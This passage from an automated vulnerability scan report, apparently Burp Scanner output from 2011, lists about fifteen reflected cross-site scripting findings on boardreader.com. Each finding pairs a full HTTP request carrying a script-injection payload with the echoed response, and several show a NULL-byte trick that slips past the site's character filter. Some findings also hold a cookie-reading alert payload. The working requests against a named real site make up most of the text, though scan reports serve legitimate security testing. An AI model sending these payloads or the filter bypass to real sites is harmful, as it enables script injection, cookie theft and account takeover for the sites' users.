Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:53:17 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:53:31 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <script>
var ACTIVE_GRAPH_GROUP = 'day'; var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=websitetoolbox.com&3f166'-alert(1)-'182d880e185=1&p=30&d=1288940011&b=0&g=&x=1'; var selectedLinkGraph = 'graph3Months';
if (selectedLinkGraph == 'graphDay' ) selectedLinkGraph = 'g ...[SNIP]...
1.100. http://boardreader.com/domain/websitetoolbox.com [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /domain/websitetoolbox.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a2db"><script>alert(1)</script>3a4a3e5c070 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /domain/websitetoolbox.com?9a2db"><script>alert(1)</script>3a4a3e5c070=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:52:32 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:52:34 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <a class="fp_adv" href="/a/websitetoolbox.com?9a2db"><script>alert(1)</script>3a4a3e5c070=1"> ...[SNIP]...
1.101. http://boardreader.com/domain/worldmastiffforum.com [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /domain/worldmastiffforum.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c581"><script>alert(1)</script>99d3eb93754 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /domain/worldmastiffforum.com?2c581"><script>alert(1)</script>99d3eb93754=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:52:21 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:52:30 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <a class="fp_adv" href="/a/worldmastiffforum.com?2c581"><script>alert(1)</script>99d3eb93754=1"> ...[SNIP]...
1.102. http://boardreader.com/domain/worldmastiffforum.com [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /domain/worldmastiffforum.com
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bbef'-alert(1)-'5ee0da9ec64 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /domain/worldmastiffforum.com?4bbef'-alert(1)-'5ee0da9ec64=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:52:45 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:52:50 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="verif ...[SNIP]... <script>
var ACTIVE_GRAPH_GROUP = 'day'; var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=worldmastiffforum.com&4bbef'-alert(1)-'5ee0da9ec64=1&p=30&d=1288939970&b=0&g=&x=1'; var selectedLinkGraph = 'graph3Months';
if (selectedLinkGraph == 'graphDay' ) selectedLinkGraph = 'g ...[SNIP]...
The value of the ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %004177f"><script>alert(1)</script>0da953a680a was submitted in the ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d parameter. This input was echoed as 4177f"><script>alert(1)</script>0da953a680a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /index.php?a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1%004177f"><script>alert(1)</script>0da953a680a&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1&ltype=ext HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:27:18 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>s0.2md ...[SNIP]... <A onclick="" href="./index.php?o=10&a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1%004177f"><script>alert(1)</script>0da953a680a&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1&ltype=ext"> ...[SNIP]...
The value of the extended_search request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 484f3"><script>alert(1)</script>8c7809fc22a was submitted in the extended_search parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1484f3"><script>alert(1)</script>8c7809fc22a&ltype=ext HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:28:57 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>s0.2md ...[SNIP]... lick="" href="./index.php?o=10&a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1484f3"><script>alert(1)</script>8c7809fc22a&ltype=ext"> ...[SNIP]...
The value of the ltype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b85f1"><script>alert(1)</script>8330a287d66 was submitted in the ltype parameter. This input was echoed as b85f1"><script>alert(1)</script>8330a287d66 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /index.php?a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1&ltype=ext%00b85f1"><script>alert(1)</script>8330a287d66 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:30:39 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>s0.2md ...[SNIP]... "./index.php?o=10&a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1&ltype=ext%00b85f1"><script>alert(1)</script>8330a287d66"> ...[SNIP]...
1.106. http://boardreader.com/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87160"><script>alert(1)</script>04f67b98015 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1&ltype=ext&87160"><script>alert(1)</script>04f67b98015=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:31:43 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>s0.2md ...[SNIP]... f="./index.php?o=10&a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1&ltype=ext&87160"><script>alert(1)</script>04f67b98015=1"> ...[SNIP]...
The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6bb6"><script>alert(1)</script>60f59291b18 was submitted in the q parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gife6bb6"><script>alert(1)</script>60f59291b18&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif&extended_search=1&ltype=ext HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:21:19 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>s0.2md ...[SNIP]... <link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://boardreader.com//linkrss/s0.2mdn.net/viewad/817-grey.gife6bb6"><script>alert(1)</script>60f59291b18?p=10&format=RSS2.0" /> ...[SNIP]...
The value of the q2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %002cc1b"><script>alert(1)</script>44dd33ad4cf was submitted in the q2 parameter. This input was echoed as 2cc1b"><script>alert(1)</script>44dd33ad4cf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /index.php?a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif%002cc1b"><script>alert(1)</script>44dd33ad4cf&extended_search=1&ltype=ext HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:28:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>s0.2md ...[SNIP]... <A onclick="" href="./index.php?o=10&a=l&q=s0.2mdn.net%2Fviewad%2F817-grey.gif&ebef7%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6f696982a6d=1&q2=s0.2mdn.net%2Fviewad%2F817-grey.gif%002cc1b"><script>alert(1)</script>44dd33ad4cf&extended_search=1&ltype=ext"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d233"><script>alert(1)</script>fb62f634db2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /linkinfo/2mdn.net9d233"><script>alert(1)</script>fb62f634db2 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:30:55 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>2mdn.n ...[SNIP]... <link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://boardreader.com//linkrss/2mdn.net9d233"><script>alert(1)</script>fb62f634db2?p=10&format=RSS2.0" /> ...[SNIP]...
1.110. http://boardreader.com/my/signup.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /my/signup.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ee33"><script>alert(1)</script>4385cd9a478 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /my/signup.html?4ee33"><script>alert(1)</script>4385cd9a478=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:04:39 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <form name="mylogin_" action="/my/signup.html?4ee33"><script>alert(1)</script>4385cd9a478=1" method="POST"> ...[SNIP]...
1.111. http://boardreader.com/s/2mdn.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /s/2mdn.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0fe6"><script>alert(1)</script>3c9811f6ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /s/2mdn.html?d0fe6"><script>alert(1)</script>3c9811f6ee=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:27:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta ...[SNIP]... <link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://boardreader.com/rss/2mdn.html?d0fe6"><script>alert(1)</script>3c9811f6ee=1&p=20&format=RSS2.0" /> ...[SNIP]...
1.112. http://boardreader.com/site/Monterey_military_Group_CafeMo_764716.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /site/Monterey_military_Group_CafeMo_764716.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 992f8"><script>alert(1)</script>4308af3ecf7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/Monterey_military_Group_CafeMo_764716.html?992f8"><script>alert(1)</script>4308af3ecf7=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:12:43 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <a href="http://boardreader.com/site/Monterey_military_Group_CafeMo_764716.html?992f8"><script>alert(1)</script>4308af3ecf7=1" title="Monterey military Group - CafeMom | Site Profile"> ...[SNIP]...
1.113. http://boardreader.com/site/Nolan_Fans_Forums_8842059.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /site/Nolan_Fans_Forums_8842059.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42801"><script>alert(1)</script>8c06b2169ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/Nolan_Fans_Forums_8842059.html?42801"><script>alert(1)</script>8c06b2169ee=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:13:17 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut ...[SNIP]... <a href="http://boardreader.com/site/Nolan_Fans_Forums_8842059.html?42801"><script>alert(1)</script>8c06b2169ee=1" title="Nolan Fans | Forums | Site Profile"> ...[SNIP]...
1.114. http://boardreader.com/site/RateDesi_Forums_13026.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://boardreader.com
Path: /site/RateDesi_Forums_13026.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59e88"><script>alert(1)</script>ff22a856e5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/RateDesi_Forums_13026.html?59e88"><script>alert(1)</script>ff22a856e5b=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;
Response
HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 07:16:39 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
